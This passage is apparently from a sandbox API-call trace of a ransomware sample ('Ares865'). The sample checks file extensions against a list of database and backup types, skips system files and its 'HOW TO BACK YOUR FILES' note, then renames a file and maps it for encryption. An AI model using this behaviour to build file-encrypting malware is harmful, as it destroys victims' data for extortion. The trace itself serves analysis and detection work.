lpString2="fp7") returned 1 [0060.662] lstrlenW (lpString="fpt") returned 3 [0060.662] lstrcmpiW (lpString1="log", lpString2="fpt") returned 1 [0060.662] lstrlenW (lpString="frm") returned 3 [0060.662] lstrcmpiW (lpString1="log", lpString2="frm") returned 1 [0060.662] lstrlenW (lpString="gdb") returned 3 [0060.662] lstrcmpiW (lpString1="log", lpString2="gdb") returned 1 [0060.663] lstrlenW (lpString="gdb") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="gdb") returned 1 [0060.663] lstrlenW (lpString="grdb") returned 4 [0060.663] lstrcmpiW (lpString1=".log", lpString2="grdb") returned -1 [0060.663] lstrlenW (lpString="gwi") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="gwi") returned 1 [0060.663] lstrlenW (lpString="hdb") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="hdb") returned 1 [0060.663] lstrlenW (lpString="his") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="his") returned 1 [0060.663] lstrlenW (lpString="ib") returned 2 [0060.663] lstrcmpiW (lpString1="og", lpString2="ib") returned 1 [0060.663] lstrlenW (lpString="idb") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="idb") returned 1 [0060.663] lstrlenW (lpString="ihx") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="ihx") returned 1 [0060.663] lstrlenW (lpString="itdb") returned 4 [0060.663] lstrcmpiW (lpString1=".log", lpString2="itdb") returned -1 [0060.663] lstrlenW (lpString="itw") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="itw") returned 1 [0060.663] lstrlenW (lpString="jet") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="jet") returned 1 [0060.663] lstrlenW (lpString="jtx") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="jtx") returned 1 [0060.663] lstrlenW (lpString="kdb") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="kdb") returned 1 [0060.663] lstrlenW (lpString="kexi") returned 4 [0060.663] lstrcmpiW (lpString1=".log", lpString2="kexi") returned -1 [0060.663] lstrlenW (lpString="kexic") returned 5 [0060.663] lstrcmpiW (lpString1="b.log", lpString2="kexic") returned -1 [0060.663] lstrlenW (lpString="kexis") returned 5 [0060.663] lstrcmpiW (lpString1="b.log", lpString2="kexis") returned -1 [0060.663] lstrlenW (lpString="lgc") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="lgc") returned 1 [0060.663] lstrlenW (lpString="lwx") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="lwx") returned -1 [0060.663] lstrlenW (lpString="maf") returned 3 [0060.663] lstrcmpiW (lpString1="log", lpString2="maf") returned -1 [0060.664] lstrlenW (lpString="maq") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="maq") returned -1 [0060.664] lstrlenW (lpString="mar") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="mar") returned -1 [0060.664] lstrlenW (lpString="marshal") returned 7 [0060.664] lstrlenW (lpString="mas") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="mas") returned -1 [0060.664] lstrlenW (lpString="mav") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="mav") returned -1 [0060.664] lstrlenW (lpString="maw") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="maw") returned -1 [0060.664] lstrlenW (lpString="mdbhtml") returned 7 [0060.664] lstrlenW (lpString="mdn") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="mdn") returned -1 [0060.664] lstrlenW (lpString="mdt") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="mdt") returned -1 [0060.664] lstrlenW (lpString="mfd") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="mfd") returned -1 [0060.664] lstrlenW (lpString="mpd") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="mpd") returned -1 [0060.664] lstrlenW (lpString="mrg") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="mrg") returned -1 [0060.664] lstrlenW (lpString="mud") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="mud") returned -1 [0060.664] lstrlenW (lpString="mwb") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="mwb") returned -1 [0060.664] lstrlenW (lpString="myd") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="myd") returned -1 [0060.664] lstrlenW (lpString="ndf") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="ndf") returned -1 [0060.664] lstrlenW (lpString="nnt") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="nnt") returned -1 [0060.664] lstrlenW (lpString="nrmlib") returned 6 [0060.664] lstrcmpiW (lpString1="db.log", lpString2="nrmlib") returned -1 [0060.664] lstrlenW (lpString="ns2") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="ns2") returned -1 [0060.664] lstrlenW (lpString="ns3") returned 3 [0060.664] lstrcmpiW (lpString1="log", lpString2="ns3") returned -1 [0060.665] lstrlenW (lpString="ns4") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="ns4") returned -1 [0060.665] lstrlenW (lpString="nsf") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="nsf") returned -1 [0060.665] lstrlenW (lpString="nv") returned 2 [0060.665] lstrcmpiW (lpString1="og", lpString2="nv") returned 1 [0060.665] lstrlenW (lpString="nv2") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="nv2") returned -1 [0060.665] lstrlenW (lpString="nwdb") returned 4 [0060.665] lstrcmpiW (lpString1=".log", lpString2="nwdb") returned -1 [0060.665] lstrlenW (lpString="nyf") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="nyf") returned -1 [0060.665] lstrlenW (lpString="odb") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="odb") returned -1 [0060.665] lstrlenW (lpString="odb") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="odb") returned -1 [0060.665] lstrlenW (lpString="oqy") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="oqy") returned -1 [0060.665] lstrlenW (lpString="ora") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="ora") returned -1 [0060.665] lstrlenW (lpString="orx") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="orx") returned -1 [0060.665] lstrlenW (lpString="owc") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="owc") returned -1 [0060.665] lstrlenW (lpString="p96") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="p96") returned -1 [0060.665] lstrlenW (lpString="p97") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="p97") returned -1 [0060.665] lstrlenW (lpString="pan") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="pan") returned -1 [0060.665] lstrlenW (lpString="pdb") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="pdb") returned -1 [0060.665] lstrlenW (lpString="pdm") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="pdm") returned -1 [0060.665] lstrlenW (lpString="pnz") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="pnz") returned -1 [0060.665] lstrlenW (lpString="qry") returned 3 [0060.665] lstrcmpiW (lpString1="log", lpString2="qry") returned -1 [0060.665] lstrlenW (lpString="qvd") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="qvd") returned -1 [0060.666] lstrlenW (lpString="rbf") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="rbf") returned -1 [0060.666] lstrlenW (lpString="rctd") returned 4 [0060.666] lstrcmpiW (lpString1=".log", lpString2="rctd") returned -1 [0060.666] lstrlenW (lpString="rod") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="rod") returned -1 [0060.666] lstrlenW (lpString="rodx") returned 4 [0060.666] lstrcmpiW (lpString1=".log", lpString2="rodx") returned -1 [0060.666] lstrlenW (lpString="rpd") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="rpd") returned -1 [0060.666] lstrlenW (lpString="rsd") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="rsd") returned -1 [0060.666] lstrlenW (lpString="sas7bdat") returned 8 [0060.666] lstrlenW (lpString="sbf") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="sbf") returned -1 [0060.666] lstrlenW (lpString="scx") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="scx") returned -1 [0060.666] lstrlenW (lpString="sdb") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="sdb") returned -1 [0060.666] lstrlenW (lpString="sdc") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="sdc") returned -1 [0060.666] lstrlenW (lpString="sdf") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="sdf") returned -1 [0060.666] lstrlenW (lpString="sis") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="sis") returned -1 [0060.666] lstrlenW (lpString="spq") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="spq") returned -1 [0060.666] lstrlenW (lpString="te") returned 2 [0060.666] lstrcmpiW (lpString1="og", lpString2="te") returned -1 [0060.666] lstrlenW (lpString="teacher") returned 7 [0060.666] lstrlenW (lpString="tmd") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="tmd") returned -1 [0060.666] lstrlenW (lpString="tps") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="tps") returned -1 [0060.666] lstrlenW (lpString="trc") returned 3 [0060.666] lstrcmpiW (lpString1="log", lpString2="trc") returned -1 [0060.666] lstrlenW (lpString="trc") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="trc") returned -1 [0060.667] lstrlenW (lpString="trm") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="trm") returned -1 [0060.667] lstrlenW (lpString="udb") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="udb") returned -1 [0060.667] lstrlenW (lpString="udl") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="udl") returned -1 [0060.667] lstrlenW (lpString="usr") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="usr") returned -1 [0060.667] lstrlenW (lpString="v12") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="v12") returned -1 [0060.667] lstrlenW (lpString="vis") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="vis") returned -1 [0060.667] lstrlenW (lpString="vpd") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="vpd") returned -1 [0060.667] lstrlenW (lpString="vvv") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="vvv") returned -1 [0060.667] lstrlenW (lpString="wdb") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="wdb") returned -1 [0060.667] lstrlenW (lpString="wmdb") returned 4 [0060.667] lstrcmpiW (lpString1=".log", lpString2="wmdb") returned -1 [0060.667] lstrlenW (lpString="wrk") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="wrk") returned -1 [0060.667] lstrlenW (lpString="xdb") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="xdb") returned -1 [0060.667] lstrlenW (lpString="xld") returned 3 [0060.667] lstrcmpiW (lpString1="log", lpString2="xld") returned -1 [0060.667] lstrlenW (lpString="xmlff") returned 5 [0060.667] lstrcmpiW (lpString1="b.log", lpString2="xmlff") returned -1 [0060.667] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb.log.Ares865") returned 75 [0060.667] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edb.log"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb.log.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edb.log.ares865"), dwFlags=0x1) returned 1 [0060.668] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb.log.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edb.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.669] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2097152) returned 1 [0060.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.669] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.670] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.670] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.670] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x200300, lpName=0x0) returned 0x164 [0060.672] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x300) returned 0x190000 [0060.672] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3450000 [0061.004] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0061.005] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0061.005] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0061.005] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0061.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0061.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0061.005] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0061.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0061.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0061.005] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0061.005] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0061.005] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0061.005] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0061.034] CloseHandle (hObject=0x164) returned 1 [0061.034] CloseHandle (hObject=0x15c) returned 1 [0061.034] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0061.034] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0061.034] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0061.050] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2b29966, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2="aoldtz.exe") returned 1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2=".") returned 1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2="..") returned 1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2="windows") returned -1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2="bootmgr") returned 1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2="temp") returned -1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2="pagefile.sys") returned -1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2="boot") returned 1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2="ids.txt") returned -1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2="ntuser.dat") returned -1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2="perflogs") returned -1 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2="MSBuild") returned -1 [0061.051] lstrlenW (lpString="edb00001.log") returned 12 [0061.051] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb.log") returned 67 [0061.051] lstrcpyW (in: lpString1=0x2cce478, lpString2="edb00001.log" | out: lpString1="edb00001.log") returned="edb00001.log" [0061.051] lstrlenW (lpString="edb00001.log") returned 12 [0061.051] lstrlenW (lpString="Ares865") returned 7 [0061.051] lstrcmpiW (lpString1="001.log", lpString2="Ares865") returned -1 [0061.051] lstrlenW (lpString=".dll") returned 4 [0061.051] lstrcmpiW (lpString1="edb00001.log", lpString2=".dll") returned 1 [0061.051] lstrlenW (lpString=".lnk") returned 4 [0061.052] lstrcmpiW (lpString1="edb00001.log", lpString2=".lnk") returned 1 [0061.052] lstrlenW (lpString=".ini") returned 4 [0061.052] lstrcmpiW (lpString1="edb00001.log", lpString2=".ini") returned 1 [0061.052] lstrlenW (lpString=".sys") returned 4 [0061.052] lstrcmpiW (lpString1="edb00001.log", lpString2=".sys") returned 1 [0061.052] lstrlenW (lpString="edb00001.log") returned 12 [0061.052] lstrlenW (lpString="bak") returned 3 [0061.052] lstrcmpiW (lpString1="log", lpString2="bak") returned 1 [0061.052] lstrlenW (lpString="ba_") returned 3 [0061.052] lstrcmpiW (lpString1="log", lpString2="ba_") returned 1 [0061.052] lstrlenW (lpString="dbb") returned 3 [0061.052] lstrcmpiW (lpString1="log", lpString2="dbb") returned 1 [0061.052] lstrlenW (lpString="vmdk") returned 4 [0061.052] lstrcmpiW (lpString1=".log", lpString2="vmdk") returned -1 [0061.052] lstrlenW (lpString="rar") returned 3 [0061.052] lstrcmpiW (lpString1="log", lpString2="rar") returned -1 [0061.052] lstrlenW (lpString="zip") returned 3 [0061.052] lstrcmpiW (lpString1="log", lpString2="zip") returned -1 [0061.052] lstrlenW (lpString="tgz") returned 3 [0061.052] lstrcmpiW (lpString1="log", lpString2="tgz") returned -1 [0061.052] lstrlenW (lpString="vbox") returned 4 [0061.052] lstrcmpiW (lpString1=".log", lpString2="vbox") returned -1 [0061.052] lstrlenW (lpString="vdi") returned 3 [0061.052] lstrcmpiW (lpString1="log", lpString2="vdi") returned -1 [0061.052] lstrlenW (lpString="vhd") returned 3 [0061.052] lstrcmpiW (lpString1="log", lpString2="vhd") returned -1 [0061.052] lstrlenW (lpString="vhdx") returned 4 [0061.052] lstrcmpiW (lpString1=".log", lpString2="vhdx") returned -1 [0061.052] lstrlenW (lpString="avhd") returned 4 [0061.052] lstrcmpiW (lpString1=".log", lpString2="avhd") returned -1 [0061.052] lstrlenW (lpString="db") returned 2 [0061.052] lstrcmpiW (lpString1="og", lpString2="db") returned 1 [0061.052] lstrlenW (lpString="db2") returned 3 [0061.052] lstrcmpiW (lpString1="log", lpString2="db2") returned 1 [0061.052] lstrlenW (lpString="db3") returned 3 [0061.052] lstrcmpiW (lpString1="log", lpString2="db3") returned 1 [0061.052] lstrlenW (lpString="dbf") returned 3 [0061.053] lstrcmpiW (lpString1="log", lpString2="dbf") returned 1 [0061.053] lstrlenW (lpString="mdf") returned 3 [0061.053] lstrcmpiW (lpString1="log", lpString2="mdf") returned -1 [0061.053] lstrlenW (lpString="mdb") returned 3 [0061.053] lstrcmpiW (lpString1="log", lpString2="mdb") returned -1 [0061.053] lstrlenW (lpString="sql") returned 3 [0061.053] lstrcmpiW (lpString1="log", lpString2="sql") returned -1 [0061.053] lstrlenW (lpString="sqlite") returned 6 [0061.053] lstrcmpiW (lpString1="01.log", lpString2="sqlite") returned -1 [0061.053] lstrlenW (lpString="sqlite3") returned 7 [0061.053] lstrcmpiW (lpString1="001.log", lpString2="sqlite3") returned -1 [0061.053] lstrlenW (lpString="sqlitedb") returned 8 [0061.053] lstrcmpiW (lpString1="0001.log", lpString2="sqlitedb") returned -1 [0061.053] lstrlenW (lpString="xml") returned 3 [0061.053] lstrcmpiW (lpString1="log", lpString2="xml") returned -1 [0061.053] lstrlenW (lpString="$er") returned 3 [0061.053] lstrcmpiW (lpString1="log", lpString2="$er") returned 1 [0061.053] lstrlenW (lpString="4dd") returned 3 [0061.053] lstrcmpiW (lpString1="log", lpString2="4dd") returned 1 [0061.053] lstrlenW (lpString="4dl") returned 3 [0061.053] lstrcmpiW (lpString1="log", lpString2="4dl") returned 1 [0061.053] lstrlenW (lpString="^^^") returned 3 [0061.053] lstrcmpiW (lpString1="log", lpString2="^^^") returned 1 [0061.053] lstrlenW (lpString="abs") returned 3 [0061.053] lstrcmpiW (lpString1="log", lpString2="abs") returned 1 [0061.053] lstrlenW (lpString="abx") returned 3 [0061.053] lstrcmpiW (lpString1="log", lpString2="abx") returned 1 [0061.053] lstrlenW (lpString="accdb") returned 5 [0061.053] lstrcmpiW (lpString1="1.log", lpString2="accdb") returned -1 [0061.053] lstrlenW (lpString="accdc") returned 5 [0061.053] lstrcmpiW (lpString1="1.log", lpString2="accdc") returned -1 [0061.053] lstrlenW (lpString="accde") returned 5 [0061.053] lstrcmpiW (lpString1="1.log", lpString2="accde") returned -1 [0061.053] lstrlenW (lpString="accdr") returned 5 [0061.053] lstrcmpiW (lpString1="1.log", lpString2="accdr") returned -1 [0061.053] lstrlenW (lpString="accdt") returned 5 [0061.053] lstrcmpiW (lpString1="1.log", lpString2="accdt") returned -1 [0061.053] lstrlenW (lpString="accdw") returned 5 [0061.054] lstrcmpiW (lpString1="1.log", lpString2="accdw") returned -1 [0061.054] lstrlenW (lpString="accft") returned 5 [0061.054] lstrcmpiW (lpString1="1.log", lpString2="accft") returned -1 [0061.054] lstrlenW (lpString="adb") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="adb") returned 1 [0061.054] lstrlenW (lpString="adb") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="adb") returned 1 [0061.054] lstrlenW (lpString="ade") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="ade") returned 1 [0061.054] lstrlenW (lpString="adf") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="adf") returned 1 [0061.054] lstrlenW (lpString="adn") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="adn") returned 1 [0061.054] lstrlenW (lpString="adp") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="adp") returned 1 [0061.054] lstrlenW (lpString="alf") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="alf") returned 1 [0061.054] lstrlenW (lpString="ask") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="ask") returned 1 [0061.054] lstrlenW (lpString="btr") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="btr") returned 1 [0061.054] lstrlenW (lpString="cat") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="cat") returned 1 [0061.054] lstrlenW (lpString="cdb") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="cdb") returned 1 [0061.054] lstrlenW (lpString="ckp") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="ckp") returned 1 [0061.054] lstrlenW (lpString="cma") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="cma") returned 1 [0061.054] lstrlenW (lpString="cpd") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="cpd") returned 1 [0061.054] lstrlenW (lpString="dacpac") returned 6 [0061.054] lstrcmpiW (lpString1="01.log", lpString2="dacpac") returned -1 [0061.054] lstrlenW (lpString="dad") returned 3 [0061.054] lstrcmpiW (lpString1="log", lpString2="dad") returned 1 [0061.054] lstrlenW (lpString="dadiagrams") returned 10 [0061.054] lstrcmpiW (lpString1="b00001.log", lpString2="dadiagrams") returned -1 [0061.054] lstrlenW (lpString="daschema") returned 8 [0061.055] lstrcmpiW (lpString1="0001.log", lpString2="daschema") returned -1 [0061.055] lstrlenW (lpString="db-journal") returned 10 [0061.055] lstrcmpiW (lpString1="b00001.log", lpString2="db-journal") returned -1 [0061.055] lstrlenW (lpString="db-shm") returned 6 [0061.055] lstrcmpiW (lpString1="01.log", lpString2="db-shm") returned -1 [0061.055] lstrlenW (lpString="db-wal") returned 6 [0061.055] lstrcmpiW (lpString1="01.log", lpString2="db-wal") returned -1 [0061.055] lstrlenW (lpString="dbc") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dbc") returned 1 [0061.055] lstrlenW (lpString="dbs") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dbs") returned 1 [0061.055] lstrlenW (lpString="dbt") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dbt") returned 1 [0061.055] lstrlenW (lpString="dbv") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dbv") returned 1 [0061.055] lstrlenW (lpString="dbx") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dbx") returned 1 [0061.055] lstrlenW (lpString="dcb") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dcb") returned 1 [0061.055] lstrlenW (lpString="dct") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dct") returned 1 [0061.055] lstrlenW (lpString="dcx") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dcx") returned 1 [0061.055] lstrlenW (lpString="ddl") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="ddl") returned 1 [0061.055] lstrlenW (lpString="dlis") returned 4 [0061.055] lstrcmpiW (lpString1=".log", lpString2="dlis") returned -1 [0061.055] lstrlenW (lpString="dp1") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dp1") returned 1 [0061.055] lstrlenW (lpString="dqy") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dqy") returned 1 [0061.055] lstrlenW (lpString="dsk") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dsk") returned 1 [0061.055] lstrlenW (lpString="dsn") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dsn") returned 1 [0061.055] lstrlenW (lpString="dtsx") returned 4 [0061.055] lstrcmpiW (lpString1=".log", lpString2="dtsx") returned -1 [0061.055] lstrlenW (lpString="dxl") returned 3 [0061.055] lstrcmpiW (lpString1="log", lpString2="dxl") returned 1 [0061.056] lstrlenW (lpString="eco") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="eco") returned 1 [0061.056] lstrlenW (lpString="ecx") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="ecx") returned 1 [0061.056] lstrlenW (lpString="edb") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="edb") returned 1 [0061.056] lstrlenW (lpString="epim") returned 4 [0061.056] lstrcmpiW (lpString1=".log", lpString2="epim") returned -1 [0061.056] lstrlenW (lpString="fcd") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="fcd") returned 1 [0061.056] lstrlenW (lpString="fdb") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="fdb") returned 1 [0061.056] lstrlenW (lpString="fic") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="fic") returned 1 [0061.056] lstrlenW (lpString="flexolibrary") returned 12 [0061.056] lstrlenW (lpString="fm5") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="fm5") returned 1 [0061.056] lstrlenW (lpString="fmp") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="fmp") returned 1 [0061.056] lstrlenW (lpString="fmp12") returned 5 [0061.056] lstrcmpiW (lpString1="1.log", lpString2="fmp12") returned -1 [0061.056] lstrlenW (lpString="fmpsl") returned 5 [0061.056] lstrcmpiW (lpString1="1.log", lpString2="fmpsl") returned -1 [0061.056] lstrlenW (lpString="fol") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="fol") returned 1 [0061.056] lstrlenW (lpString="fp3") returned 3 [0061.056] lstrcmpiW (lpString1="log", lpString2="fp3") returned 1 